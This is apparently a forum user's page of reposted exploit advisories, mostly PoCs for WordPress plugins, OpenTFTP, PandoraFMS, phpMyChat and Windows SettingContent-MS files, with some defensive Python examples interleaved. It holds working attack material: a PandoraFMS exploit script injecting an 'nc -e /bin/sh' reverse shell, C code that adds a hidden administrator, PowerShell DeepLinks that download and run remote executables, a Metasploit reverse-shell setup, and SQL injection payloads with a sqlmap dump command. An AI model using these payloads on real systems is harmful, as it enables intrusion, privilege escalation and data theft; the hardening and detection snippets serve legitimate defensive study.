
Everything posted by HireHackking
-
WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Title: WordPress Plugin tutor 1.5.3 - Persistent Cross-Site Scripting
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# Vendor Homepage: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page: /Quiz.php
===================================================================
Vulnerable source:
   447: $topic_id = sanitize_text_field($_POST['topic_id']);
   473: echo $topic_id;
===================================================================
Exploit:
   POST to localhost/wp-content/plugins/tutor/classes/Quiz.php
   with $_POST['topic_id'] = <script>alert('mehran')</script>
===================================================================
Note: line 473 echoes the value without esc_html()/esc_attr(), but sanitize_text_field() on line 447 does strip HTML tags, so confirm in your own test that the echoed value still carries the tag before treating this as exploitable.
-
WordPress Plugin Tutor.1.5.3 - Local File Inclusion
# Title: WordPress Plugin tutor 1.5.3 - Local File Inclusion
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# Vendor Homepage: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page: /instructors.php
===================================================================
Vulnerable source:
   3: $sub_page = tutor_utils()->avalue_dot('sub_page', $_GET);
   4: if(!empty($sub_page))
   5:     $include_file = tutor()->path . "views/pages/{$sub_page}.php";
   6:     if(file_exists($include_file))
   7:         include $include_file;
===================================================================
Exploit:
   localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
Note: ".php" is appended on line 5, so only files ending in .php (reached with ../ traversal from views/pages/) can be included; the file_exists() check on line 6 does nothing against traversal.
=================================================================================
contact me:
   telegram: @MF0584
   gmail: mehranfeizi13841384@gmail.com
-
OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author: boku
# Date: 2020-02-12
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version: 1.66
# Tested On: Windows 10 (32-bit)
# About:
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,
#  Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/
# Vulnerability Details:
# On Windows, Open TFTP Server v1.66 suffers from insecure file and folder permissions.
# This allows a low-privilege local attacker to escalate to Administrator by replacing the
# 'TFTPServer' service binary with a maliciously crafted executable. After the default
# installation the TFTP Server runs as an 'Auto_Start' service with 'LocalSystem' privileges,
# so once the attacker has planted the malicious binary it executes as SYSTEM on the next
# boot of the Windows device. See the PoC below for details.

## Service Information (there is also an Unquoted Service Path)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\OpenTFTPServer\OpenTFTPServerSP.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Open TFTP Single Port Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                  BUILTIN\Users:(OI)(CI)(ID)R
                  NT AUTHORITY\Authenticated Users:(ID)C
                  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Users:(I)(RX)
                                       NT AUTHORITY\Authenticated Users:(I)(M)

## Local Privilege Escalation Proof of Concept
#0. Download & install Open TFTP Server v1.66
#1. Create a low-privileged user & switch to that user
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
User name                    lowPrivUser
Local Group Memberships      *Users
Global Group memberships     *None
C:\>whoami
mycomputer\lowprivuser
#2. Move the service EXE to a new name
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe
        1 file(s) moved.
#3. Create the malicious binary on Kali Linux
   1) Download dependencies
   root@kali# apt install gcc-mingw-w64-i686 wine64 -y
   2) Add-admin-user C code
   root@kali# cat addAdmin.c
   #include <windows.h>
   #include <stdlib.h>
   int main(void) {
       /* runs as SYSTEM when the service starts: create a user and make it an Administrator */
       system("net user hacker mypassword /add");
       system("net localgroup Administrators hacker /add");
       /* hand over to the renamed original binary so the service still comes up */
       WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe", 0);
       return 0;
   }
   3) Compile the code
   root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe
#4. Transfer the created 'OpenTFTPServerSP.exe' to the Windows host
#5. Move the created 'OpenTFTPServerSP.exe' binary into the 'C:\OpenTFTPServer\' folder
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\
        1 file(s) moved.
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"
02/12/2020  05:59 PM           288,659 OpenTFTPServerSP.exe
02/12/2020  06:38 PM           221,560 ~OpenTFTPServerSP.exe
#6. Reboot the computer
#7. Look at that new Admin
C:\Users\lowPrivUser>net users hacker | findstr "Local name active"
User name                    hacker
Account active               Yes
Local Group Memberships      *Administrators      *Users
C:\Users\lowPrivUser>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
boku
hacker
-
PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947

#!/usr/bin/python3
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4

This exploit can be edited to hit the four authenticated RCE vulnerabilities in PANDORAFMS.
If the default vulnerable parameter does not work, move the payload to one of
ip_src, dst_port or src_port.

Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947
'''
import requests
import sys

if len(sys.argv) < 6:
    print("Usage: ./exploit.py http://url username password listenerIP listenerPort")
    sys.exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Closes the double-quoted filter value, appends a reverse shell, and comments out the rest with '#'.
cmd = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'

login = {
    'nick': user,
    'pass': password,
    'login_button': 'Login'
}

req = requests.Session()
print("Sending login request ...")
req.post(url + "/pandora_console/index.php?login=1", data=login)

payload = {
    'date': "",
    'time': "",
    'period': "",
    'interval_length': "",
    'chart_type': "",
    'max_aggregates': "1",
    'address_resolution': "0",
    'name': "",
    'assign_group': "0",
    'filter_type': "0",
    'filter_id': "0",
    'filter_selected': "0",
    'ip_dst': cmd,          # move cmd to ip_src, dst_port or src_port if this field does not fire
    'ip_src': "",
    'dst_port': "",
    'src_port': "",
    'advanced_filter': "",
    'aggregate': "dstip",
    'router_ip': "",
    'output': "bytes",
    'draw_button': "Draw"
}

print("[+] Sending exploit ...")
exploit = req.post(url + "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",
                   data=payload,
                   headers={
                       'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
                       'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                       'Accept-Encoding': 'gzip, deflate',
                       'Content-Type': 'application/x-www-form-urlencoded'})

if exploit.status_code == 200:
    print("[+] Everything seems ok, check your listener. If no connection is established, move the payload to ip_src, dst_port or src_port.")
else:
    print("[-] Couldn't send the HTTP request, try again.")
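The payload above works because a filter value is pasted into a shell command line inside double quotes, so a leading `";` closes the quote and starts a new command. The following is an added example, not the exploit author's code and not PandoraFMS's own source (which the page does not show): it models that construction with `echo` standing in for the real tool (an assumption), runs the hostile value through a shell, and shows the hardened form, which validates the value as an IP address or network and passes it as a single argv element with no shell at all.

```python
import ipaddress
import subprocess


def netflow_cmd_vulnerable(ip_dst):
    """The shape the payload relies on: a filter value dropped into a shell command
    line between double quotes. echo stands in for the real tool (assumption)."""
    return 'echo "ip dst %s"' % ip_dst


def run_shell(cmd):
    """Execute through /bin/sh, exactly what shell=True does; returns stdout."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_ip(value):
    """Accept only a literal IP address or CIDR network; anything else is rejected."""
    for parse in (ipaddress.ip_address, ipaddress.ip_network):
        try:
            return str(parse(value))
        except ValueError:
            continue
    raise ValueError("filter value is not an IP address or network: %r" % value)


def is_rejected(value):
    """True when validate_ip() refuses the value (helper for callers and tests)."""
    try:
        validate_ip(value)
        return False
    except ValueError:
        return True


def netflow_cmd_safe(ip_dst):
    """Hardened form: validated value, its own argv element, no shell involved."""
    return ["echo", "ip dst " + validate_ip(ip_dst)]


def run_argv(argv):
    """Execute an argv list directly (no shell metacharacter interpretation)."""
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    hostile = '";echo INJECTED #'   # same breakout shape as the ";nc -e ... # payload
    print(run_shell(netflow_cmd_vulnerable(hostile)))      # second line is the injected command
    print(run_argv(netflow_cmd_safe("10.0.0.5")), end="")
    print("hostile value rejected:", is_rejected(hostile))
```

The allowlist approach (validate the type of the value) matters more than escaping here: an `nfdump`-style filter is free text only from the application's point of view, and the server-side code should know whether it is expecting an address or a port number and refuse anything else.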
-
WordPress Plugin contact-form-7 5.1.6 - Remote File Upload
# Title: WordPress Plugin contact-form-7 5.1.6 - Remote File Upload
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-11
# Vendor Homepage: https://wordpress.org/plugins/contact-form-7/

Vulnerable source (modules/file.php, in execution order):
    78: function wpcf7_file_validation_filter($result, $tag)
    82:     $file = $_FILES[$name] : null;
   121:     $uploads_dir = wpcf7_upload_tmp_dir();
   122:     $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
   124:     $filename = $file['name'];
   125:     $filename = wpcf7_canonicalize($filename, 'as-is');
   126:     $filename = wpcf7_antiscript_file_name($filename);
   128:     $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag);
   131:     $filename = wp_unique_filename($uploads_dir, $filename);
   132:     $new_file = path_join($uploads_dir, $filename);
   134:     move_uploaded_file($file['tmp_name'], $new_file)

Exploit:
<?php
// Post a file to the plugin's file module over curl.
$shahab = "file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the old "@filename" syntax, which PHP 5.6+ disables by default and PHP 7 no longer supports.
curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip' => new CURLFile($shahab)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print $result;
?>

Location of the uploaded file: http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

Note: the trace shows the filename passing through wpcf7_antiscript_file_name() and the file landing under wpcf7_upload_tmp_dir(), and modules/file.php is loaded by WordPress rather than requested directly; verify in your own test that the request reaches the upload code and that the stored path is the one reported above.
-
WordPress Plugin Wordfence.7.4.5 - Local File Disclosure
# Title: WordPress Plugin wordfence 7.4.5 - Local File Disclosure
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# Vendor Homepage: https://wordpress.org/plugins/wordfence/
==============================================================================
Vulnerable source (lib/wordfenceClass.php):
   5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
   5662: readfile($localFile);
=================================================================================
Exploit:
   localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================
Note: the preg_replace() on line 5645 strips only one leading ".." or a leading run of slashes; every later "../" segment is left in place, which is why traversal out of ABSPATH remains possible once this code path is reached.
-
WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Title: WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author: mehran feizi
# Category: Webapps
# Date: 2020-02-11
# Vendor Homepage: https://wordpress.org/plugins/ultimate-member/

Vulnerable page: /class-admin-upgrade.php
Vulnerable source:
   354: if(empty($_POST['pack'])) ... else
   356:     include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';

Exploit:
   localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-upgrade.php
   $_POST['pack'] = <script>alert('xss')</script>

Note: line 356 always includes "<pack>/init.php" below packages_dir, so the value that matters for inclusion is a directory name (with "../" segments to leave packages_dir); the <script> string above is the author's test value, not a working inclusion path.
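The three inclusion/disclosure advisories above (tutor sub_page, wordfence file, ultimate-member pack) share one root cause: a request value is joined onto a base directory and handed to include()/readfile() without checking where the resulting path ends up. The following is an added example in Python, not the plugins' code and not the advisory author's: it transliterates the two path constructions quoted on this page (the Wordfence preg_replace() becomes the equivalent Python regex), then applies the containment check that should sit in front of the file operation. The base directories and the inputs are constructed for the example.

```python
import os
import re

# Python transliteration of the Wordfence 7.4.5 filter quoted on this page:
#   preg_replace('/^(?:\.\.|[\/]+)/', '', $_GET['file'])
# It removes ONE leading ".." or ONE run of leading slashes and nothing else,
# so every later ".." segment reaches the filesystem untouched.
LEADING_DOTDOT_OR_SLASHES = re.compile(r"^(?:\.\.|/+)")


def wordfence_style_path(abspath, user_file):
    """Vulnerable construction (wordfenceClass.php line 5645): ABSPATH . preg_replace(...)."""
    return abspath + LEADING_DOTDOT_OR_SLASHES.sub("", user_file, count=1)


def tutor_style_path(plugin_path, sub_page):
    """Vulnerable construction (tutor instructors.php line 5): path . "views/pages/{$sub_page}.php"."""
    return plugin_path + "views/pages/" + sub_page + ".php"


def stays_inside(base_dir, candidate):
    """Hardened check: canonicalise both sides (symlinks included) and require the
    resolved candidate to remain under base_dir. Apply before readfile()/include()."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base


def is_single_component(name):
    """Stricter rule for include()-style parameters such as sub_page or pack:
    accept a bare page/package name only, never anything that looks like a path."""
    return re.fullmatch(r"[A-Za-z0-9_-]+", name) is not None


def evaluate(abspath="/var/www/html/", plugin="/var/www/html/wp-content/plugins/tutor/"):
    """Run both constructions against a benign and a traversal input (constructed values)
    and report whether the containment check would allow the resulting path."""
    pages_dir = plugin + "views/pages"
    cases = {
        "wordfence_benign":    (abspath,   wordfence_style_path(abspath, "wp-config-sample.php")),
        "wordfence_traversal": (abspath,   wordfence_style_path(abspath, "../../../../etc/passwd")),
        "tutor_benign":        (pages_dir, tutor_style_path(plugin, "instructors")),
        # ".php" is appended by the plugin, so the traversal has to name a PHP file.
        "tutor_traversal":     (pages_dir, tutor_style_path(plugin, "../../../../../wp-config")),
    }
    return {name: (path, stays_inside(base, path)) for name, (base, path) in cases.items()}


if __name__ == "__main__":
    for name, (path, allowed) in evaluate().items():
        print(f"{name:22} {'ALLOW' if allowed else 'BLOCK'}  {path}")
```

For include() parameters the single-component allowlist is the better fix: the application knows the value is a page or package name, so there is no reason to let it contain a separator at all. The realpath()-based check is what to use when a relative path is genuinely part of the feature, as with a file download.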
-
Title: Windows Shell Remote Code Execution Vulnerability (CVE-2018-8414) - Reproduction
0x00 Introduction to SettingContent-MS files

.SettingContent-MS is a file type introduced in Windows 10. Its content is written in XML and it is used mainly to create shortcuts to Windows Settings pages. When a file with the SettingContent-MS suffix is opened on Windows 10, the system does not check whether the file lives in the Control Panel's own directory: it directly runs the program named in the file's DeepLink tag, whether the file sits in a system directory or is a carefully crafted file downloaded from the network. A SettingContent-MS file therefore executes whatever malicious program its DeepLink points at, which gives arbitrary code execution.

The DeepLink tag holds a binary to execute together with its parameters, and that is the problem: an attacker can craft a .SettingContent-MS file whose DeepLink element points at a binary such as cmd.exe or powershell.exe and obtain shell command execution.

0x01 Windows Defender AV ASR rules

Windows Defender AV Attack Surface Reduction (ASR) rules are designed mainly to prevent malware from exploiting computers and applications. They were introduced in Windows 10 version 1709 and later and in Windows Server 2016; no earlier version of Windows Defender has ASR rules. Starting with Windows 10 versions 1703 through 1803 and Windows Server versions 1709 through 1803, Windows Defender AV ships the ASR rules under the AttackSurfaceReductionRules_Ids setting (the original article shows this in a screenshot that is not reproduced here). On build 10240 and below, Windows Defender AV has no AttackSurfaceReductionRules_Ids at all.

Note: at some point the exploit fails depending on the file's location (with the default policy settings), so it is enough to copy the PoC file into the following directory and run it there. (If the default path has been changed, you can run scmwrap.exe -install with administrator privileges.)

C:\Users\[user]\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\[language]\

0x02 Reproducing the vulnerability

1. Simple test: pop a calculator

1. Put the test PoC file into the directory
   C:\Users\admin(user)\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\zh-cn\
2. Click the PoC file to test it:

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\System32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\System32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>

Other <DeepLink>...</DeepLink> values that can replace the one in the PoC:

1. %windir%\System32\cmd.exe /c "C:\Program Files\Internet Explorer\iexplore.exe" -k https://www.backlion.org/
2. %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -Wind Hidden -Noni -NoLogo -Comm "(New-Object System.Net.WebClient).DownloadFile('http://192.168.225.129/PWN.EXE', $env:AppData+'\svrcheck.exe'); Start-Process $env:AppData'\svrcheck.exe'; Exit-PSSession;"
3. powershell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('https://www.xxx.com/test.exe', '%appdata%\rundll32.exe'); Start-Process '%appdata%\rundll32.exe'
4. wmic os get /format:'https://gist.githubusercontent.com/caseysmithrc/68924cabbeca1285D2941298A5B91C24/78065CA63504C9A0F411071377FBE861DE487E44D4D4D4D4D4D4D4D4D4D4D4D4D4D4/'

3. Click the test SettingContent-MS file and the calculator pops up.

2. Embed in Office and pop a calculator

1. Create a Word document; Office 2007 is used here as an example.
2. Choose Insert > Object > Create from File and select the SettingContent-MS file.
3. Double-click the inserted icon to open it and the calculator pops up.

3. Reverse shell to Kali

Script download address:
https://raw.githubusercontent.com/backlion/demo/master/auto_settingcontent-ms.py

1. Run auto_settingcontent-ms.py under Kali and fill in the listening IP address (the Kali host's own IP) and port:
   root@kali2018:/opt# python auto_settingcontent-ms.py
2. test.SettingContent-MS is generated in the current directory, and the generated file is copied automatically to the /var/www/html directory.
3. Start the Apache service:
   root@kali2018:/opt# service apache2 start
4. Start MSF, then set the payload, the IP address and the listening port:
   msf > use exploit/multi/handler
   msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
   msf exploit(multi/handler) > show options
   msf exploit(multi/handler) > set LHOST 10.250.117.10
   msf exploit(multi/handler) > set LPORT 5555
   msf exploit(multi/handler) > exploit
5. Copy the generated test.SettingContent-MS, create a new test.doc document and insert it as an object.
6. Open test.docx and click the icon to trigger the reverse connection.
7. The target system's shell appears under Kali.

0x03 Affected versions

Product                                                  Article   Type             Impact                  Severity    Supersedes
Windows 10 Version 1703 for 32-bit Systems               4343885   Security Update  Remote Code Execution   Important   4338826
Windows 10 Version 1703 for x64-based Systems            4343885   Security Update  Remote Code Execution   Important   4338826
Windows 10 Version 1709 for 32-bit Systems               4343897   Security Update  Remote Code Execution   Important   4338825
Windows 10 Version 1709 for 64-based Systems             4343897   Security Update  Remote Code Execution   Important   4338825
Windows 10 Version 1803 for 32-bit Systems               4343909   Security Update  Remote Code Execution   Important   4338819
Windows 10 Version 1803 for x64-based Systems            4343909   Security Update  Remote Code Execution   Important   4338819
Windows Server, version 1709 (Server Core installation)  4343897   Security Update  Remote Code Execution   Important   4338825
Windows Server, version 1803 (Server Core installation)  4343909   Security Update  Remote Code Execution   Important   4338819

0x04 Defence recommendations

It is best to block .SettingContent-MS files at the firewall or e-mail gateway. In addition, consider using Group Policy to force .SettingContent-MS files to open in Notepad (https://montour.co/2016/09/group-policy-force-js-files/).

0x05 Reference links

https://www.t00ls.net/thread-47622-1-1.html
https://hk.saowen.com/a/18EA08A24EFD7D58C9D24CE69CAD41AAC8E1535026D266A3E6CED826D77777A341
https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
https://github.com/joesecurity/scmwrap
https://github.com/sscyber0/deeplink_reverse_tcp
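The defence section above covers blocking at the gateway; the complementary detection is to look inside any .SettingContent-MS file that does arrive and inspect its DeepLink, since that element is the only place the executed program can be named. The following is an added example, not the article author's code and not the scmwrap project's: it parses the XML with the standard library, extracts every DeepLink regardless of namespace, and flags values that launch a shell or script host or carry the argument patterns seen in the alternative payloads listed above. The binary list and the patterns are assumptions to tune per environment; the first sample is the article's calc.exe PoC, the second is a constructed benign shortcut.

```python
import re
import xml.etree.ElementTree as ET

# Programs with no business in a Settings shortcut (assumption; extend for your environment).
SUSPECT_BINARIES = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe",
}

# Argument patterns taken from the alternative DeepLink payloads listed in the article.
SUSPECT_PATTERNS = {
    "remote URL":       re.compile(r"https?://", re.I),
    "command chaining": re.compile(r"[;&|]"),
    "hidden window":    re.compile(r"-w\S*\s+hidden", re.I),
    "wmic stylesheet":  re.compile(r"/format:", re.I),
}


def deep_links(xml_text):
    """Every DeepLink element's text, regardless of namespace or tag case."""
    root = ET.fromstring(xml_text)
    links = []
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1]          # strip "{namespace}" prefix
        if local.lower() == "deeplink" and el.text and el.text.strip():
            links.append(el.text.strip())
    return links


def first_binary(deep_link):
    """Basename of the program the DeepLink launches (quoted or bare path)."""
    s = deep_link.strip()
    prog = s[1:].split('"', 1)[0] if s.startswith('"') else s.split(None, 1)[0]
    return prog.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(xml_text):
    """[(deep_link, [reasons])] for every DeepLink that looks like command execution."""
    findings = []
    for link in deep_links(xml_text):
        reasons = []
        binary = first_binary(link)
        if binary in SUSPECT_BINARIES:
            reasons.append("launches " + binary)
        for label, pattern in SUSPECT_PATTERNS.items():
            if pattern.search(link):
                reasons.append(label)
        if reasons:
            findings.append((link, reasons))
    return findings


# The calc.exe PoC from the article (identity elements omitted; they do not affect execution).
POC_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\System32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\System32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>"""

# A constructed benign shortcut for comparison (not a real Windows file).
BENIGN_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <DeepLink>%windir%\System32\control.exe /name Microsoft.System</DeepLink>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>"""

if __name__ == "__main__":
    for name, sample in (("poc", POC_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, "->", assess(sample) or "no findings")
```

Matching on the basename of the first token is deliberate: the article's payloads reach cmd.exe and powershell.exe through %windir% and %SystemRoot% rather than fixed paths, so a check on the full path would be trivially evaded.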
-
phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
# Date: 2020-02-13
# Exploit Author: J3rryBl4nks
# Vendor Homepage: http://ciprianmp.com/latest/
# Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/
# Version: phpMyChat Plus 1.98
# Tested on: Windows 10/Kali Rolling

# The phpMyChat Plus 1.98 application is vulnerable to SQL injection
# (boolean-based blind, error-based, time-based blind) on the deluser.php page
# through the pmc_username parameter.

# POC code:
# Capture the request through Burp Suite:

POST /plus/deluser.php HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOSTNAME/plus/deluser.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9
Upgrade-Insecure-Requests: 1

L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In

# Then use sqlmap to dump the user table:

sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username

Parameter: pmc_username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In
-
Microsoft Windows Kernel - Information Disclosure
# PoC for the SWAPGS attack ([CVE-2019-1125](https://nvd.nist.gov/vuln/detail/CVE-2019-1125))

This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019.

## Contents
* leakgsbkva - variant 1 (look for random values in kernel memory; limited to PE kernel image header)
* leakgsbkvat - variant 2 (extract random values from kernel memory; limited to PE kernel image header)
* whitepaper
* Black Hat USA 2019 presentation

## Prerequisites
1. Visual Studio 2015
2. Unpatched Windows x64 (7 or newer)

## Authors
* Andrei Vlad LUȚAȘ
* Dan Horea LUȚAȘ

## Additional resources
[Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE)

Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48071.zip
-
EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-13
# Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows
# Software Link: https://ftp.epson.com/drivers/epson16189.exe
# SEIKO EPSON CORP
# Tested Version: 2.81
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en

# Steps to discover the Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """
EMP_NSWLSV  EMP_NSWLSV  C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe  Auto

C:\>sc qc "EMP_NSWLSV"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EMP_NSWLSV
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EMP_NSWLSV
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
-
SprintWork 2.3.1 - Local Privilege Escalation
# Exploit Title: SprintWork 2.3.1 - Local Privilege Escalation
# Exploit Author: boku
# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
